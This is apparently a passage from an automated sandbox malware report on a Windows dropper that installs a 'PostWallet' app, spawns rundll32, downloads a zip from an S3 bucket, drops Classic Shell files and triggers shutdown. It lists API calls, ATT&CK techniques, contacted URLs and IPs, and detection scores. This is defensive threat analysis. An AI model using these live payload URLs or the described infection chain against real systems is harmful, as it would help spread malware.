          Source: ClassicStartMenu.exe.12.drBinary or memory string: UStartMenu: hook failed: 0x%08XStartMenu: can't find taskbar, retryingStartMenu: failed to open process %dStartMenu: failed to get process nameStartMenu: found wrong process %sexplorer.exeStartMenu: can't find Progman, retryingProgmanApplicationManager_DesktopShellWindowSoftware\IvoSoft\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txtStartMenu: hooking ExplorerClassicStartMenuDLL.dllClassicStartMenu.StartMenuMsgATL:%pStartMenu: Taskbar CreatedClassicStartMenu.CStartHookWindow`
          Source: ClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.drBinary or memory string: ProgmanCabinetWClass
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_00348D9F cpuid 3_2_00348D9F
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: GetLocaleInfoW,3_2_6D186DEB
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_6D186F11
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: EnumSystemLocalesW,3_2_6D17EF3A
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: GetLocaleInfoW,3_2_6D186980
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: EnumSystemLocalesW,3_2_6D186B0D
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_6D186B98
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: EnumSystemLocalesW,3_2_6D186A27
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: EnumSystemLocalesW,3_2_6D186A72
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,3_2_6D186785
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: GetLocaleInfoW,3_2_6D187017
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_6D1870E6
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: GetLocaleInfoW,3_2_6D17F3FF
          Source: C:\Windows\System32\rundll32.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,12_2_00415230
          Source: C:\Windows\System32\rundll32.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_004142E0
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeQueries volume information: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ComponentModel.DataAnnotations\v4.0_4.0.0.0__31bf3856ad364e35\System.ComponentModel.DataAnnotations.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_00344850 AllocateAndInitializeSid,calloc,InitializeAcl,GetLastError,Warning,AddAccessAllowedAce,GetLastError,Warning,IsValidAcl,GetLastError,Warning,LocalAlloc,InitializeSecurityDescriptor,GetLastError,Warning,SetSecurityDescriptorDacl,GetLastError,Warning,IsValidSecurityDescriptor,GetLastError,Warning,CreateNamedPipeW,GetLastError,Warning,CreateEventW,GetLastError,Warning,FreeSid,free,LocalFree,CloseHandle,CloseHandle,ConnectNamedPipe,GetLastError,GetLastError,Warning,FreeSid,free,LocalFree,3_2_00344850
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeCode function: 0_2_0061B06B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0061B06B
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_00346810 calloc,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetLastError,ImpersonateLoggedOnUser,GetLastError,GetUserNameW,RevertToSelf,GetLastError,Warning,Warning,free,Warning,Warning,GetEnvironmentStringsW,GetLastError,CreateEnvironmentBlock,GetLastError,GetLastError,LoadUserProfileW,GetLastError,CreateEnvironmentBlock,GetLastError,GetLastError,SetEnvironmentVariableW,FreeEnvironmentStringsW,DestroyEnvironmentBlock,DestroyEnvironmentBlock,free,UnloadUserProfile,CloseHandle,free,GetLastError,3_2_00346810
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_00344B50 socket,setsockopt,WSAGetLastError,htonl,htons,bind,listen,WSAGetLastError,CreateEventW,GetLastError,WSAEventSelect,WSAGetLastError,CloseHandle,closesocket,3_2_00344B50

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure1
          Valid Accounts          		1
          Native API          		1
          DLL Side-Loading          		1
          Exploitation for Privilege Escalation          		1
          Disable or Modify Tools          		OS Credential Dumping1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		2
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts2
          Command and Scripting Interpreter          		1
          Valid Accounts          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory1
          Account Discovery          		Remote Desktop ProtocolData from Removable Media21
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts3
          Service Execution          		5
          Windows Service          		1
          Valid Accounts          		2
          Obfuscated Files or Information          		Security Account Manager2
          File and Directory Discovery          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCron1
          Registry Run Keys / Startup Folder          		1
          Access Token Manipulation          		1
          Timestomp          		NTDS44
          System Information Discovery          		Distributed Component Object ModelInput Capture13
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script5
          Windows Service          		1
          DLL Side-Loading          		LSA Secrets231
          Security Software Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts113
          Process Injection          		13
          Masquerading          		Cached Domain Credentials2
          Process Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
          Registry Run Keys / Startup Folder          		1
          Valid Accounts          		DCSync141
          Virtualization/Sandbox Evasion          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Access Token Manipulation          		Proc Filesystem1
          Application Window Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt141
          Virtualization/Sandbox Evasion          		/etc/passwd and /etc/shadow1
          System Owner/User Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron113
          Process Injection          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
          Rundll32          		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1404607 Sample: 00023948209303294#U00ac3203... Startdate: 07/03/2024 Architecture: WINDOWS Score: 80 75 s3-r-w.sa-east-1.amazonaws.com 2->75 77 bucreate203920233.s3.sa-east-1.amazonaws.com 2->77 81 Multi AV Scanner detection for dropped file 2->81 83 Multi AV Scanner detection for submitted file 2->83 85 Machine Learning detection for dropped file 2->85 87 Yara detected Generic Downloader 2->87 14 00023948209303294#U00ac320302282349843984903.exe 4 2->14         started        17 00023948209303294#U00ac320302282349843984903.exe 2->17         started        signatures3 process4 file5 73 C:\Users\user\AppData\Local\...\Update.exe, PE32 14->73 dropped 19 Update.exe 14 20 14->19         started        process6 file7 55 C:\Users\user\AppData\...\vmwarebase.dll, PE32 19->55 dropped 57 C:\Users\user\AppData\...\vcruntime140.dll, PE32 19->57 dropped 59 C:\Users\user\AppData\...\FilePost?a.exe, PE32 19->59 dropped 61 C:\Users\user\AppData\Local\...\Update.exe, PE32 19->61 dropped 22 FilePost?a.exe 2 19->22         started        process8 signatures9 89 Contain functionality to detect virtual machines 22->89 25 FilePost?a.exe 3 22->25         started        28 conhost.exe 22->28         started        process10 file11 71 C:\Users\user\AppData\Local\...\Main.dll, PE32+ 25->71 dropped 30 cmd.exe 1 25->30         started        32 conhost.exe 25->32         started        process12 process13 34 rundll32.exe 30->34         started        36 conhost.exe 30->36         started        process14 38 rundll32.exe 59 34->38         started        dnsIp15 79 s3-r-w.sa-east-1.amazonaws.com 16.12.1.14, 443, 49729 unknown United States 38->79 63 C:\Program Files\...\Windows XP Luna.skin, PE32 38->63 dropped 65 C:\Program Files\...\Windows Basic.skin, PE32 38->65 dropped 67 C:\Program Files\...\Windows Aero.skin7, PE32 38->67 dropped 69 26 other malicious files 38->69 dropped 91 System process connects to network (likely due to code injection or exploit) 38->91 93 Uses shutdown.exe to shutdown or reboot the system 38->93 43 cmd.exe 1 38->43         started        45 shutdown.exe 1 38->45         started        47 conhost.exe 38->47         started        file16 signatures17 process18 process19 49 conhost.exe 43->49         started        51 sc.exe 1 43->51         started        53 conhost.exe 45->53         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          00023948209303294#U00ac320302282349843984903.exe8%VirustotalBrowse

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Program Files\Classic Shell\ClassicIEDLL_64.dll100%Joe Sandbox ML
          C:\Program Files\Classic Shell\ClassicExplorer32.dll3%ReversingLabs
          C:\Program Files\Classic Shell\ClassicExplorer32.dll0%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicExplorer64.dll3%ReversingLabs
          C:\Program Files\Classic Shell\ClassicExplorer64.dll0%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicExplorerSettings.exe0%ReversingLabs
          C:\Program Files\Classic Shell\ClassicExplorerSettings.exe0%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicIEDLL_32.dll0%ReversingLabs
          C:\Program Files\Classic Shell\ClassicIEDLL_32.dll0%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicIEDLL_64.dll17%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicIE_32.exe0%ReversingLabs
          C:\Program Files\Classic Shell\ClassicIE_32.exe0%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicIE_64.dll18%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicIE_64.exe0%ReversingLabs
          C:\Program Files\Classic Shell\ClassicIE_64.exe0%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicShellUpdate.exe0%ReversingLabs
          C:\Program Files\Classic Shell\ClassicShellUpdate.exe1%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicStartMenu.exe0%ReversingLabs
          C:\Program Files\Classic Shell\ClassicStartMenu.exe0%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicStartMenuDLL.dll0%ReversingLabs
          C:\Program Files\Classic Shell\ClassicStartMenuDLL.dll0%VirustotalBrowse
          C:\Program Files\Classic Shell\Skins\Classic Skin.skin0%ReversingLabs
          C:\Program Files\Classic Shell\Skins\Classic Skin.skin0%VirustotalBrowse
          C:\Program Files\Classic Shell\Skins\Classic Skin.skin70%ReversingLabs
          C:\Program Files\Classic Shell\Skins\Classic Skin.skin70%VirustotalBrowse
          C:\Program Files\Classic Shell\Skins\ClassicIE_64.exe0%ReversingLabs
          C:\Program Files\Classic Shell\Skins\ClassicIE_64.exe0%VirustotalBrowse
          C:\Program Files\Classic Shell\Skins\EppManifest.dll0%ReversingLabs
          C:\Program Files\Classic Shell\Skins\EppManifest.dll0%VirustotalBrowse
          C:\Program Files\Classic Shell\Skins\Full Glass.skin0%ReversingLabs
          C:\Program Files\Classic Shell\Skins\Full Glass.skin0%VirustotalBrowse
          C:\Program Files\Classic Shell\Skins\Metallic.skin70%ReversingLabs
          C:\Program Files\Classic Shell\Skins\Metallic.skin70%VirustotalBrowse

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://defaultcontainer/PostWallet.nuspec0%Avira URL Cloudsafe
          http://defaultcontainer/lib/net48/vcruntime140.dll0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.bsdiff0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.nuspec0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.diff0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.exe0%Avira URL Cloudsafe
          http://www.yoursite.com0%Avira URL Cloudsafe
          http://defaultcontainer/lib/net48/FilePost?a.exe0%Avira URL Cloudsafe
          http://20.64.96.112/home3/MAOEM1002MMDLA.php?a=0%Avira URL Cloudsafe
          http://defaultcontainer/_rels/.rels0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.rels0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.dll0%Avira URL Cloudsafe
          http://www.yoursite.com1%VirustotalBrowse
          http://20.64.96.112/home3/MAOEM1002MMDLA.php?a=1%VirustotalBrowse
          http://www.classicshell.net%s%sClassicShell.chm%s%sClassicShell.chm::/%s.html0%Avira URL Cloudsafe
          http://defaultcontainer/lib/net48/Main1.dll0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.shasum0%Avira URL Cloudsafe
          http://defaultcontainer/lib/net48/vmwarebase.dll0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.psmdcp0%Avira URL Cloudsafe
          http://schemas.openxmlformats.or0%Avira URL Cloudsafe
          http://defaultcontainer/package/services/metadata/core-properties/0efccca87b4345efa345d5a58c8332f0.p0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          s3-r-w.sa-east-1.amazonaws.com
          		16.12.1.14
          		truefalse
            		high
            bucreate203920233.s3.sa-east-1.amazonaws.com
            		unknown
            		unknownfalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketTc.zipfalse
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://github.com/myuser/myrepoUpdate.exefalse
                  		high
                  http://defaultcontainer/tempfiles/sample.bsdiffUpdate.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		low
                  http://www.vmware.com/0Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drfalse
                    		high
                    http://defaultcontainer/lib/net48/vcruntime140.dllUpdate.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketTc.zip8rundll32.exe, 0000000C.00000002.4091911884.000001A76A94F000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://www.classicshell.netClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.drfalse
                        		high
                        https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketTc.zipvrundll32.exe, 0000000C.00000002.4091911884.000001A76A94F000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://defaultcontainer/tempfiles/sample.diffUpdate.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          http://defaultcontainer/tempfiles/sample.nuspecUpdate.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          http://www.vmware.com/0/Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drfalse
                            		high
                            https://api.github.com/#Update.exefalse
                              		high
                              http://defaultcontainer/PostWallet.nuspecUpdate.exe, 00000002.00000002.1680892254.000000000288A000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002997000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://defaultcontainer/tempfiles/sample.exeUpdate.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://www.delphiforfun.org/rundll32.exe, rundll32.exe, 0000000C.00000002.4088855611.0000000000428000.00000020.00000001.01000000.0000000D.sdmp, Main.dll.7.dr, ClassicIE_64.dll.12.drfalse
                                		high
                                https://bucreate203920233.s3.sa-east-1.amazonaws.com/rundll32.exe, 0000000C.00000002.4091911884.000001A76A94F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.yoursite.comClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.drfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://bucreate203920233.s3.sa-east-1.amazonaws.com/Vh$orundll32.exe, 0000000C.00000002.4091911884.000001A76A94F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://20.64.96.112/home3/MAOEM1002MMDLA.php?a=ClassicIE_64.dll.12.drfalse
                                    • 1%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://defaultcontainer/lib/net48/FilePost?a.exeUpdate.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		low
                                    http://defaultcontainer/_rels/.relsUpdate.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		low
                                    http://defaultcontainer/tempfiles/sample.dllUpdate.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		low
                                    http://defaultcontainer/tempfiles/sample.relsUpdate.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		low
                                    http://www.classicshell.net%s%sClassicShell.chm%s%sClassicShell.chm::/%s.htmlClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.drfalse
                                    • Avira URL Cloud: safe
                                    		low
                                    http://defaultcontainer/lib/net48/Main1.dllUpdate.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		low
                                    http://defaultcontainer/tempfiles/sample.shasumUpdate.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		low
                                    http://defaultcontainer/lib/net48/vmwarebase.dllUpdate.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		low
                                    http://www.classicshell.net/files/updates/update_PAClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.drfalse
                                      		high
                                      http://schemas.openxmlformats.orUpdate.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://defaultcontainer/tempfiles/sample.psmdcpUpdate.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      http://defaultcontainer/package/services/metadata/core-properties/0efccca87b4345efa345d5a58c8332f0.pUpdate.exe, 00000002.00000002.1680892254.000000000288A000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002997000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      16.12.1.14
                                      		s3-r-w.sa-east-1.amazonaws.comUnited States
                                      		unknownunknownfalse

                                      General Information

                                      Joe Sandbox version:40.0.0 Tourmaline
                                      Analysis ID:1404607
                                      Start date and time:2024-03-07 10:35:11 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 10m 22s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:22
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:1
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:00023948209303294#U00ac320302282349843984903.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:00023948209303294320302282349843984903.exe
                                      Detection:MAL
                                      Classification:mal80.rans.troj.evad.winEXE@25/60@1/1
                                      EGA Information:
                                      • Successful, ratio: 75%
                                      HCA Information:Failed
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Override analysis time to 240s for rundll32

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target Update.exe, PID 6772 because it is empty
                                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      10:36:16API Interceptor1x Sleep call for process: rundll32.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      16.12.1.14hyh6728i0zbnnp rspehu.msiGet hashmaliciousUnknownBrowse

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        s3-r-w.sa-east-1.amazonaws.com0219830219301290321012notas.exeGet hashmaliciousUnknownBrowse
                                        • 3.5.232.21
                                        0219830219301290321012notas.exeGet hashmaliciousUnknownBrowse
                                        • 3.5.234.1
                                        0923840932020004-3-0.exeGet hashmaliciousUnknownBrowse
                                        • 3.5.232.185
                                        WKYC506_2389030007-00901003007010_777380775_#U00b2.exeGet hashmaliciousUnknownBrowse
                                        • 52.95.163.114
                                        WKYC506_2389030007-00901003007010_777380775_#U00b2.exeGet hashmaliciousUnknownBrowse
                                        • 16.12.0.34
                                        DOC7186723912#U0370.msiGet hashmaliciousHidden Macro 4.0Browse
                                        • 52.95.164.60
                                        DOC0974045396#U0370.msiGet hashmaliciousHidden Macro 4.0Browse
                                        • 52.95.164.98
                                        file.msiGet hashmaliciousHidden Macro 4.0Browse
                                        • 52.95.164.11
                                        F#U00b498074756.msiGet hashmaliciousHidden Macro 4.0Browse
                                        • 52.95.164.122
                                        https://dismelo.com.brGet hashmaliciousUnknownBrowse
                                        • 16.12.0.2

                                        ASNs

                                        No context

                                        JA3 Fingerprints

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        37f463bf4616ecd445d4a1937da06e19Purchase List.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 16.12.1.14
                                        Update.jsGet hashmaliciousSocGholishBrowse
                                        • 16.12.1.14
                                        6009287162.vbsGet hashmaliciousXWormBrowse
                                        • 16.12.1.14
                                        6009287162.vbsGet hashmaliciousXWormBrowse
                                        • 16.12.1.14
                                        SW_PC_Interact2.3.5_Build6.exeGet hashmaliciousDBatLoaderBrowse
                                        • 16.12.1.14
                                        6009287162.vbsGet hashmaliciousXWormBrowse
                                        • 16.12.1.14
                                        Condensers.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 16.12.1.14
                                        PDFCreator-1_5_0_setup.exeGet hashmaliciousUnknownBrowse
                                        • 16.12.1.14
                                        factura-022853.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 16.12.1.14
                                        OKaDvPJcTF.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, PureLog StealerBrowse
                                        • 16.12.1.14

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Program Files\Classic Shell\ClassicExplorer32.dll

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
